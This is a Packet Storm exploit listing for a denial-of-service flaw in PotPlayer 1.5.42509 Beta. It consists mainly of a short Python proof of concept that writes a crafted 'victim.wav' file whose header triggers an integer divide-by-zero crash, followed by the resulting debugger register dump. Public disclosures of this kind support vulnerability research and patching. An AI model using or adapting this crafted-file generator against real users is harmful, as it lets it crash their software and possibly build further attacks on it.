PotPlayer 1.5.42509 Beta Denial Of Service

2013-12-16T00:00:00
ID PACKETSTORM:124448
Type packetstorm
Reporter sajith
Modified 2013-12-16T00:00:00

Description

                                        
                                            `###########################################################  
#[~] Exploit Title:PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero  
#Exploit)  
#[~] Author: sajith  
#[~] version: PotPlayer 1.5.42509 Beta  
#[~]Vendor Homepage: http://daumpotplayer.com/  
#[~] Tested in: Windows XP SP3  
#[~] vulnerable app link:http://daumpotplayer.com/download/  
###########################################################  
  
#POC:  
#-------  
#!/usr/bin/python  
raw_input("Hit Enter to create a malicious file")  
  
f = open("victim.wav","w")  
  
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"  
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"  
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"  
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")  
f.write(header)  
  
print "[#] File created by sajith shetty"  
  
raw_input("Hit enter to exit")  
#-----  
'''  
(694.4d8): Integer divide-by-zero - code c0000094 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=ffffffff ebx=040e0be0 ecx=00000000 edx=00000000 esi=ffffffff  
edi=0021977a  
eip=748fe82c esp=0131f2a0 ebp=0131f334 iopl=0 nv up ei pl zr na pe  
nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  
efl=00010246  
'''  
  
`